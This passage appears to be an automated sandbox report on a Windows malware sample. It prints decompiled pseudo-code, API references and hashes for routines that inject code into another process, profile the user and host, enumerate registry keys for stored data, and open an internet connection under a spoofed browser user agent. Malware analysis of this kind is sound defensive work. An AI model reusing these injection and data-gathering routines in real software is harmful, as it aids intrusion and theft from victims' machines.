					if(_t26 != 0) {
						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x422bac + E0040F5B1, 0, 0, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							VirtualFreeEx(_t23, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t14, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t23);
				}
				return _v5;
			}

0x00415a2b
0x00415a2e
0x00415a3c
0x00415a45
0x00415a47
0x00415a49
0x00415a4b
0x00415a50
0x00415a55
0x00415a59
0x00415a6d
0x00415a73
0x00415a78
0x00415a9d
0x00415a7a
0x00415a80
0x00415a89
0x00415a8f
0x00415a8f
0x00415a78
0x00415aa4
0x00415aaa
0x00415ab1

APIs

OpenProcess.KERNEL32(0000047A,00000000,74B5F560,00000000,74B5F560,?,?,00415BE3,?,?,00000000,?,74B5F560,00000000), ref: 00415A3F
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0083215D,00000000,00000000,00000000), ref: 00415A6D
WaitForSingleObject.KERNEL32(00000000,00002710,?,00415BE3,?,?,00000000,?,74B5F560,00000000), ref: 00415A80
CloseHandle.KERNEL32(74B5F560,?,00415BE3,?,?,00000000,?,74B5F560,00000000), ref: 00415A89
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,00415BE3,?,?,00000000,?,74B5F560,00000000), ref: 00415A9D
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00415BE3,?,?,00000000,?,74B5F560,00000000), ref: 00415AA4

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
String ID:
API String ID: 14861764-0
Opcode ID: 8220b198f7b67531fb22bddd8be1d97469799202e3700ddd72e63d850d6cfad6
Instruction ID: 47e51c9887388b09ab39a5e6fea5a819ba18c86b18ad0d6ae4c51121a33a3c69
Opcode Fuzzy Hash: 8220b198f7b67531fb22bddd8be1d97469799202e3700ddd72e63d850d6cfad6
Instruction Fuzzy Hash: 86019EB2144148BFDB105FA4DCC8EEF3EACDB893D4B04813AFA45E6160C6794D858678

Uniqueness

Uniqueness Score: -1.00%

Function 00404EA2, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00404EA2(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				char _v20;
				char _v64;
				char _v552;
				char _v556;
				short _v588;
				void* __ebx;
				void* __esi;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed short _t71;
				signed short _t75;
				void* _t92;
				void* _t95;
				void* _t97;
				signed short _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t109;
				signed int _t111;
				char* _t112;
				void* _t113;

				_t109 = __edx;
				_t106 = __ecx;
				_t111 = _a4;
				_t114 =  *_t111;
				_t99 = 1;
				_v5 = 0;
				if( *_t111 == 0) {
					_t97 = E0041BC8B(_t114);
					 *_t111 = _t97;
					if(_t97 == 0) {
						return 0;
					}
					_v5 = 1;
				}
				__eflags = _a8 & 0x00000001;
				if((_a8 & 0x00000001) == 0) {
					L9:
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) != 0) {
						_push( &_v12);
						_push(0x20000);
						_push(0x2713);
						_t105 = 4;
						_v12 = 0x2030309;
						_t99 = E0041BC9F(_t111, _t105);
					}
					L11:
					__eflags = _a8 & 0x00000004;
					if((_a8 & 0x00000004) == 0) {
						L16:
						__eflags = _t99;
						if(_t99 == 0) {
							L32:
							__eflags = _v5 - 1;
							if(_v5 == 1) {
								E004163A8( *_t111);
								 *_t111 =  *_t111 & 0x00000000;
								__eflags =  *_t111;
							}
							L34:
							return _t99;
						}
						__eflags = _a8 & 0x00000008;
						if((_a8 & 0x00000008) == 0) {
							L20:
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							}
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) == 0) {
								L28:
								__eflags = _t99;
								if(_t99 == 0) {
									goto L32;
								}
								__eflags = _a8 & 0x00000020;
								if((_a8 & 0x00000020) != 0) {
									E00404DEE(_t106, _t111, 2);
									E00404DEE(_t106, _t111, 0x17);
								}
								goto L34;
							}
							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
							_a4 = _t62;
							__eflags = _t62;
							if(_t62 != 0) {
								__eflags = 0;
								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
								_t106 =  &_v588;
								_t99 = E0041BD4C(_t62,  &_v588, _t109, 0, _t111, 0x271e);
							}
							_a4 = 0x104;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							} else {
								_t64 =  &_v588;
								__imp__GetUserNameExW(2, _t64,  &_a4);
								__eflags = _t64;
								if(_t64 != 0) {
									_t65 = _a4;
									__eflags = _t65;
									if(_t65 != 0) {
										__eflags = 0;
										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
										_t106 =  &_v588;
										_t99 = E0041BD4C(_t65,  &_v588, _t109, 0, _t111, 0x271f);
									}
								}
								goto L28;
							}
						}
						_t112 =  &_v20;
						E0040E447(_t112);
						_push(_t112);
						_push(0x20000);
						_push(0x271c);
						_t100 = 6;
						_t71 = E0041BC9F(_a4, _t100);
						_t99 = _t71;
						__eflags = _t99;
						if(_t99 == 0) {
							_t111 = _a4;
							goto L32;
						}
						__imp__GetUserDefaultUILanguage();
						_v12 = _t71 & 0x0000ffff;
						_push( &_v12);
						_push(0x20000);
						_push(0x271d);
						_t101 = 2;
						_t75 = E0041BC9F(_a4, _t101);
						_t111 = _a4;
						_t99 = _t75;
						goto L20;
					}
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E004164AA();
					_push( &_v12);
					_push(0x20000);
					_push(0x2719);
					_t102 = 4;
					_t99 = E0041BC9F(_t111, _t102);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E004164D2();
					_push( &_v12);
					_push(0x20000);
					_push(0x271b);
					_t103 = 4;
					_t99 = E0041BC9F(_t111, _t103);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = GetTickCount();
					_push( &_v12);
					_push(0x20000);
					_push(0x271a);
					_t104 = 4;
					_t99 = E0041BC9F(_t111, _t104);
					goto L16;
				}
				_t92 = E0040F087(_t106,  &_v556);
				_t106 =  &_v552;
				_t99 = E0041BD4C(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				_t95 = E0040F1E7( &_v552,  &_v64);
				__eflags = _v64;
				if(__eflags != 0) {
					_t106 =  &_v64;
					_t99 = E0041BD4C(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
				}
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				goto L9;
			}

0x00404ea2
0x00404ea2
0x00404ead
0x00404eb0
0x00404eb4
0x00404eb6
0x00404eba
0x00404ebc
0x00404ec1
0x00404ec5
0x00000000
0x00404ec7
0x00404ece
0x00404ece
0x00404ed2
0x00404edb
0x00404f24
0x00404f24
0x00404f28
0x00404f2d
0x00404f2e
0x00404f2f
0x00404f36
0x00404f39
0x00404f45
0x00404f45
0x00404f47
0x00404f47
0x00404f4b
0x00404fc0
0x00404fc0
0x00404fc2
0x004050c5
0x004050c5
0x004050c9
0x004050cd
0x004050d2
0x004050d2
0x004050d2
0x004050d5
0x00000000
0x004050d5
0x00404fc8
0x00404fcc
0x0040501a
0x0040501a
0x0040501c
0x00000000
0x00000000
0x00405022
0x00405026
0x004050a6
0x004050a6
0x004050a8
0x00000000
0x00000000
0x004050aa
0x004050ae
0x004050b3
0x004050bb
0x004050bb
0x00000000
0x004050ae
0x00405036
0x0040503c
0x0040503f
0x00405041
0x00405043
0x0040504a
0x00405053
0x0040505e
0x0040505e
0x00405060
0x00405067
0x00405069
0x00000000
0x0040506b
0x0040506f
0x00405078
0x0040507e
0x00405080
0x00405082
0x00405085
0x00405087
0x00405089
0x00405090
0x00405099
0x004050a4
0x004050a4
0x00405087
0x00000000
0x00405080
0x00405069
0x00404fce
0x00404fd1
0x00404fd8
0x00404fdc
0x00404fdd
0x00404fe4
0x00404fe5
0x00404fea
0x00404fec
0x00404fee
0x004050c2
0x00000000
0x004050c2
0x00404ff4
0x00404ffd
0x00405003
0x00405007
0x00405008
0x0040500f
0x00405010
0x00405015
0x00405018
0x00000000
0x00405018
0x00404f4d
0x00404f4f
0x00000000
0x00000000
0x00404f5a
0x00404f60
0x00404f61
0x00404f62
0x00404f69
0x00404f71
0x00404f73
0x00404f75
0x00000000
0x00000000
0x00404f80
0x00404f86
0x00404f87
0x00404f88
0x00404f8f
0x00404f97
0x00404f99
0x00404f9b
0x00000000
0x00000000
0x00404fa7
0x00404fad
0x00404fae
0x00404faf
0x00404fb6
0x00404fbe
0x00000000
0x00404fbe
0x00404ee4
0x00404eef
0x00404efa
0x00404efc
0x00404efe
0x00000000
0x00000000
0x00404f04
0x00404f09
0x00404f0e
0x00404f16
0x00404f1e
0x00404f1e
0x00404f20
0x00404f22
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00404FA1
GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?), ref: 00404FF4
GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 00405036
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00405078

Strings

, xrefs: 004050AA

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: NameUser$CountDefaultFileLanguageModuleTick
String ID:
API String ID: 2256650695-3916222277
Opcode ID: 9542bdbe358d296b74b1ad62f22883fa16b04c325b4f519f60f2310b5e50a746
Instruction ID: 1e18e3d7d8df62da46e1ad7ff54b50ea9d24a47e102682491c65d87806719bcd
Opcode Fuzzy Hash: 9542bdbe358d296b74b1ad62f22883fa16b04c325b4f519f60f2310b5e50a746
Instruction Fuzzy Hash: E051C9716413487ADB10AF65DC49BDF7BA8DF42304F08406BBA44BF2C1DB7999848B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4C6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040E4C6(void* _a4, WCHAR* _a8) {
				char _v40;
				char _v160;
				char _v680;
				void* __edi;
				void* __esi;
				void** _t11;
				void* _t13;
				void* _t16;
				void* _t18;
				void* _t23;
				void* _t28;
				void* _t30;
				WCHAR* _t34;

				_t11 =  &_a4;
				_t28 = 0;
				__imp__ConvertSidToStringSidW(_a4, _t11);
				if(_t11 != 0) {
					_t37 =  &_v160;
					_t13 = 4;
					E0040FA33(_t13,  &_v160);
					_push(_a4);
					_t34 =  &_v680;
					_t16 = E0041709B(_t37, 0x104, _t34, _t37);
					_pop(_t30);
					if(_t16 > 0) {
						_t18 = 5;
						E0040FA33(_t18,  &_v40);
						_t23 = E0041A4CC(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
						if(_t23 != 0 && _t23 != 0xffffffff) {
							PathUnquoteSpacesW(_t34);
							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
							asm("sbb bl, bl");
							_t28 = 1;
						}
					}
					LocalFree(_a4);
				}
				return _t28;
			}

0x0040e4d0
0x0040e4d7
0x0040e4d9
0x0040e4e1
0x0040e4eb
0x0040e4f1
0x0040e4f2
0x0040e4f7
0x0040e502
0x0040e508
0x0040e50e
0x0040e511
0x0040e518
0x0040e519
0x0040e530
0x0040e537
0x0040e541
0x0040e54e
0x0040e55a
0x0040e55c
0x0040e55c
0x0040e537
0x0040e561
0x0040e568
0x0040e56d

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0040E4D9
LocalFree.KERNEL32(?,.exe,00000000), ref: 0040E561

Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1

PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 0040E541
ExpandEnvironmentStringsW.KERNEL32(?,004097F1,00000104), ref: 0040E54E

Strings

.exe, xrefs: 0040E4E8

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
String ID: .exe
API String ID: 2200435814-4119554291
Opcode ID: 27c302094f5ca439a91159505e5f9a1c7cdac35a0dc2bbfa1433aaf21669ec4a
Instruction ID: 3ddb389e04ce27eed32a34c3266d53fe9de05c99f3e1a2e70141092bac62231b
Opcode Fuzzy Hash: 27c302094f5ca439a91159505e5f9a1c7cdac35a0dc2bbfa1433aaf21669ec4a
Instruction Fuzzy Hash: 1B11E3726001046BDB20AB7ADD09ACB3BACDF44324F000936B958F31A1DA39DA49CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004080CB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 47
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004080CB(void* __edx) {
				void _v108;
				char _v120;
				char _v212;
				long _v216;
				char _v224;
				void* __esi;
				void* _t8;
				void* _t16;

				_t16 = __edx;
				_t8 = GetThreadDesktop(GetCurrentThreadId());
				if(_t8 != 0) {
					_t8 = GetUserObjectInformationW(_t8, 2,  &_v108, 0x64,  &_v216);
					if(_t8 != 0 && _v216 == 0x4e) {
						E0040ED80(0x2937498d,  &_v212, 0);
						_t8 = E00416419( &_v224,  &_v120, 0x4c);
						if(_t8 == 0) {
							_t8 = E00407CD9( &_v120, _t16, 0x4228e0, _t8);
							if(_t8 == 0) {
								_t8 = E00407F44(0x4228e0, 0);
							} else {
								 *0x422b98 =  *0x422b98 | 0x00000004;
							}
						}
					}
				}
				return _t8;
			}

0x004080cb
0x004080df
0x004080e7
0x004080f8
0x00408100
0x00408115
0x00408124
0x0040812b
0x00408133
0x0040813a
0x00408149
0x0040813c
0x0040813c
0x0040813c
0x0040813a
0x0040812b
0x00408100
0x00408152

APIs

GetCurrentThreadId.KERNEL32 ref: 004080D8
GetThreadDesktop.USER32(00000000), ref: 004080DF
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 004080F8

Part of subcall function 00407CD9: TlsAlloc.KERNEL32(004228E0,00000000,0000018C,00000000,00000000), ref: 00407CF2

Strings

N, xrefs: 00408102
(B, xrefs: 0040812E

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Thread$AllocCurrentDesktopInformationObjectUser
String ID: N$(B
API String ID: 454308152-4076436461
Opcode ID: 56ab13a3b8b23d419e87125e6f3566ca491d3beb6f87944971a0b72e03f70ba9
Instruction ID: e58d89df9795c67907d30c683fd5755cbd39ffbafc00000c1142f65a35a4cd7a
Opcode Fuzzy Hash: 56ab13a3b8b23d419e87125e6f3566ca491d3beb6f87944971a0b72e03f70ba9
Instruction Fuzzy Hash: E80184706043056AE610AF619F46FAB739CAF00724F40453EFA95B61E0EF78E905C65F

Uniqueness

Uniqueness Score: -1.00%

Function 00417F7C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417F7C(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t18 = 0;
				do {
					_t1 = _t18 + 0x42200c; // 0x42200c
					_t2 = _t18 + 0x422008; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t18 = _t18 + 8;
				} while (_t18 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}

0x00417f7c
0x00417f7c
0x00417f82
0x00417f84
0x00417f84
0x00417f99
0x00417f9d
0x00417fe1
0x00000000
0x00417fe1
0x00417fa0
0x00417fa2
0x00417fa4
0x00417fab
0x00417fb2
0x00417fb8
0x00417fbb
0x00417fcf
0x00417fd8
0x00417fdb
0x00000000
0x00417fdb
0x00417fe5

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00417F93
InternetSetOptionA.WININET(00000000,00000002,0042200C,00000004), ref: 00417FB2
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00417FCF
InternetCloseHandle.WININET(00000000), ref: 00417FDB

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00417F84, 00417F92

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Internet$CloseConnectHandleOpenOption
String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
API String ID: 910987326-3737944857
Opcode ID: 001633508bdec48a5cbde64b8784d1cb2dcce620f70cf4de1caf6a5037f5e4b5
Instruction ID: 233fdcc74de1c4df476598a684af1a1d63bf04d2232e1abe6ca04bd1acb3866e
Opcode Fuzzy Hash: 001633508bdec48a5cbde64b8784d1cb2dcce620f70cf4de1caf6a5037f5e4b5
Instruction Fuzzy Hash: EBF0F0722042007BEA2257629D8CDAB7A7EEBC9B15B04042EF646E1030CA358991C778

Uniqueness

Uniqueness Score: -1.00%

Function 004183F0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E004183F0() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E00416806( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}

0x004183ff
0x00418401
0x00418407
0x0041840c
0x00418414
0x0041841c
0x00418422
0x00418429
0x0041842f
0x00418430
0x00418433
0x0041843d
0x00418442
0x00418444
0x00418444
0x0041844a
0x00418460
0x00418460
0x00418462
0x00418466
0x00418466
0x00418470

APIs

LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00418401
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00418414
FreeLibrary.KERNEL32(?), ref: 00418466

Strings

urlmon.dll, xrefs: 004183FA
ObtainUserAgentString, xrefs: 0041840E

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ObtainUserAgentString$urlmon.dll
API String ID: 145871493-2685262326
Opcode ID: 115aea22a974dab37f59f2a5b76d22246288a45edcbd9793065513e056ebc81b
Instruction ID: 37e9883a60be7ee82cd010c877e0619590b6ab9ba2e3da3fd6febc6d00d26d22
Opcode Fuzzy Hash: 115aea22a974dab37f59f2a5b76d22246288a45edcbd9793065513e056ebc81b
Instruction Fuzzy Hash: EC0148B1D01259BFCB10ABE49E849DE7BB8AB04314F2045BEE655F3290DD748E848B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040BACA, Relevance: 7.7, APIs: 5, Instructions: 202
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040BACA(char* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				signed int _v16;
				char* _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				char* _v48;
				char _v60;
				char _v80;
				char _v100;
				char _v120;
				char _v152;
				char _v216;
				char _v284;
				short _v804;
				void* __edi;
				void* __esi;
				intOrPtr _t70;
				int _t102;
				int _t110;
				int _t114;
				void* _t115;
				signed int _t117;
				void* _t119;
				intOrPtr _t121;
				void* _t124;
				intOrPtr _t127;
				int _t134;
				intOrPtr _t136;
				char* _t138;
				char* _t141;
				signed int _t145;
				void* _t146;
				void* _t147;

				_t129 = __ecx;
				_t70 = E00416378(0xc08);
				_t127 = _t70;
				_t134 = 0;
				_v24 = _t127;
				if(_t127 == 0) {
					return _t70;
				} else {
					E0040FA33(0x83,  &_v216);
					_t141 =  &_v284;
					E0040FA33(0x84, _t141);
					_v48 =  &_v216;
					_v44 = _t141;
					E0041645B( &_v36,  &_v36, 0, 8);
					E0040FA33(0x85,  &_v120);
					E0040FA33(0x86,  &_v100);
					E0040FA33(0x87,  &_v60);
					_t145 =  &_v80;
					E0040FA33(0x88, _t145);
					_t12 = _t127 + 0x3fc; // 0x3fc
					_v20 = _t12;
					_v16 = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
							goto L22;
						}
						_v28 = _t134;
						_v8 = 0x104;
						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
							L21:
							RegCloseKey(_v12);
							goto L22;
						} else {
							goto L4;
						}
						do {
							L4:
							_t136 = _v24;
							_v28 = _v28 + 1;
							_t102 = E0041A4CC(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
							_t145 = _t145 | 0xffffffff;
							_v8 = _t102;
							if(_t102 != _t145 && _t102 != 0) {
								_t137 = _t136 + 0x1fe;
								_t110 = E0041A4CC(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
								_v8 = _t110;
								if(_t110 == _t145 || _t110 == 0) {
									_t114 = E0041A4CC(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
									_v8 = _t114;
									if(_t114 == _t145 || _t114 == 0) {
										goto L19;
									} else {
										goto L10;
									}
								} else {
									L10:
									_t115 = _v12;
									_t129 =  &_v804;
									_v40 = _t115;
									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
										_t117 = _t145;
									} else {
										_t145 =  &_v40;
										_t117 = E0041A5F4(_t145,  &_v80, _t116, _v20, 0xff);
									}
									_v8 = _t117;
									if(_t117 != 0xffffffff && _t117 != 0) {
										_t138 = _v20;
										if(E0040BA70(_t138) > 0) {
											_t145 =  &_v152;
											_t119 = 0x56;
											E0040FA33(_t119, _t145);
											_t121 = _v24;
											_push(_t121);
											_t129 = _t138;
											_push(_t138);
											_push(_t121 + 0x1fe);
											_t124 = E0041709B(_t145, 0x307, _t138 + 0x1fe, _t145);
											_t147 = _t147 + 0x10;
											if(_t124 > 0) {
												_t129 =  &_v36;
												if(E0041679C(_t124,  &_v36, _v20 + 0x1fe) != 0) {
													_v32 = _v32 + 1;
												}
											}
										}
									}
									goto L19;
								}
							}
							L19:
							_v8 = 0x104;
						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
						_t134 = 0;
						goto L21;
						L22:
						_v16 = _v16 + 1;
					} while (_v16 < 2);
					E004163A8(_v24);
					if(_v32 <= _t134) {
						return E004163A8(_v36);
					}
					return E004099E1(0x307, _v36, 0xcb);
				}
			}

0x0040baca
0x0040badb
0x0040bae0
0x0040bae2
0x0040bae4
0x0040bae9
0x0040bd42
0x0040baef
0x0040bafa
0x0040baff
0x0040bb0a
0x0040bb15
0x0040bb1c
0x0040bb24
0x0040bb31
0x0040bb3e
0x0040bb4b
0x0040bb50
0x0040bb58
0x0040bb5d
0x0040bb63
0x0040bb66
0x0040bb6e
0x0040bb89
0x00000000
0x00000000
0x0040bba2
0x0040bba5
0x0040bbb4
0x0040bcff
0x0040bd02
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bbba
0x0040bbba
0x0040bbba
0x0040bbbd
0x0040bbcf
0x0040bbd4
0x0040bbd7
0x0040bbdc
0x0040bbf9
0x0040bbff
0x0040bc04
0x0040bc09
0x0040bc1e
0x0040bc23
0x0040bc28
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bc36
0x0040bc36
0x0040bc36
0x0040bc41
0x0040bc49
0x0040bc54
0x0040bc69
0x0040bc56
0x0040bc5a
0x0040bc62
0x0040bc62
0x0040bc6b
0x0040bc71
0x0040bc77
0x0040bc81
0x0040bc85
0x0040bc8b
0x0040bc8c
0x0040bc91
0x0040bc94
0x0040bc95
0x0040bc97
0x0040bc9d
0x0040bcac
0x0040bcb1
0x0040bcb6
0x0040bcc2
0x0040bccc
0x0040bcce
0x0040bcce
0x0040bccc
0x0040bcb6
0x0040bc81
0x00000000
0x0040bc71
0x0040bc09
0x0040bcd1
0x0040bce5
0x0040bcf5
0x0040bcfd
0x00000000
0x0040bd08
0x0040bd08
0x0040bd0b
0x0040bd18
0x0040bd20
0x00000000
0x0040bd39
0x00000000
0x0040bd2f

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 0040BB81
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040BBAC
RegCloseKey.ADVAPI32(?), ref: 0040BD02

Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0040BCEF

Part of subcall function 0041A4CC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0040E535,?,?,00000104), ref: 0041A562

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 0040BC4C

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 217e9c16c3478ef97a51a3403a6901c047e2c684b70e534788975e95918b5a9c
Instruction ID: 85b80d4268bffbcee80a7b021e4d16a8010a9ab3eb35ca381ebdbd4bde21d4ba
Opcode Fuzzy Hash: 217e9c16c3478ef97a51a3403a6901c047e2c684b70e534788975e95918b5a9c
Instruction Fuzzy Hash: 11713C71E00219ABDF11DBA5CD45AEEB7BCEF48304F14007AB905F3291DB389E459BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB90, Relevance: 7.7, APIs: 5, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040AB90(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				char _v564;
				short _v576;
				short _v588;
				short _v600;
				short _v608;
				WCHAR* _v612;
				WCHAR* _v616;
				WCHAR* _v620;
				WCHAR* _v624;
				WCHAR* _v628;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t51;
				WCHAR* _t54;
				WCHAR* _t56;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t63;
				long _t67;
				WCHAR* _t69;
				long _t77;
				long _t80;
				WCHAR* _t82;
				void* _t83;
				WCHAR* _t86;
				WCHAR* _t87;
				short* _t92;
				WCHAR* _t93;
